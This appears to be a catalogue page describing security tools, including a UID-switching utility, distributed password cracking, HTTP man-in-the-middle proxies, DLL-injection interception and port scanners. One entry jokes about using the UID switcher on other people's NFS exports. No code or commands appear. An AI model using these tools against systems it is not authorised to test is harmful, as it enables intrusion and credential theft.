    The become utility changes the current effective, or real, user and group identity to those specified on the command line. The default shell (/bin/sh) is then executed.
    UID and GID are specified numercially and do not have to be currently defined on the system.
    Lots of fun when playing around with other peoples NFS exports.
    Coder
    A windows utility to encode and decode various encoding schemes. Currently supports Base64, Hex, HTTP URL Encoding and MD5.
    Dnetj
    Dnetj is a distributed client/server version of John the ripper.
    It is operated in much the same way as distributed.net or setiathome, but is designed to crack password hash files.
    ETrace
    ETrace is a configurable static port network tracing tool, similar to traceroute, but supporting ICMP, TCP, UDP and other IP protocols.
    Echo Mirage
    Echo Mirage is a generic network proxy. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified.
    GenIP
    IA small utility, based on the NMap target specification code, for quickly and easily generating lists of IP addresses.
    ICMPScan
    Does what it says on the tin: Scans the specified address, or addresses, for ICMP responses. Handles echo (type 8 ), timestamp (type 13), address mask (type 17), information (type 15) and router solicitation (type 10) requests.
    John The Ripper MPI Patch
    This is an updated version of Ryan Lim's patch for john the ripper to support MPI, in addition to a large number of third party patches to support additional ciphers and such.
    MassResolve
    This program performs multi-threaded reverse DNS lookups. It can be passed a netblock or a file of IP addresses to process.
    ObexSend
    ObexSend is a simple command line tool to transfer a file via OBEX FTP to a device with a Bluetooth interface. It requires the user to specify the MAC address of the desination device, the OBEX FTP channel and the name of the file to send.
    Odysseus
    Odysseus is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Odysseus will intercept an HTTP session's data in either direction and give the user the ability to alter the data before transmission.
    RFIDTool
    RFIDtool has been designed to perform atomic tasks on RFID tags. This focus allows for the tool to be easily incorporated into scripts to acheive more complex and useful tasks. One example is to load RFID tags with varying data depending up their storage size.
    SSLCat
    SSLCat is a netcat like utility with SSL support. SSLCat is a simple Unix utility that reads and writes data across an SSL enable network connection.
    SSLCat accepts a hostname and optional port number (443 is used if none is specified) and attempts to form a SSLv2 connection to the specified host. If all goes well, data is read from stdin and sent across the encrypted connection, while incoming data from the encrypted connection is sent to stdout.
    Screen Shooter
    A windows utility to simplifies taking screen shots of either the currently focused window or the entire desktop. Screen Shooter uses configurable hot keys hot keys and supports Bitmap, GIF, JPEG, PNG and TIF image formats.
    SynScan
    A quick half-open port scanner. This tool will send TCP packets with the SYN flag set at the destination address. SynScan will send traffic as fast as the host network interface can support.
    Telemachus
    A companion utility for Odysseus allowing further analysis and manipulation of HTTP transactions.


    This article is being updated on a regular basis.


    Note: ONLY USE THESE TOOLS ON YOUR OWN NETWORK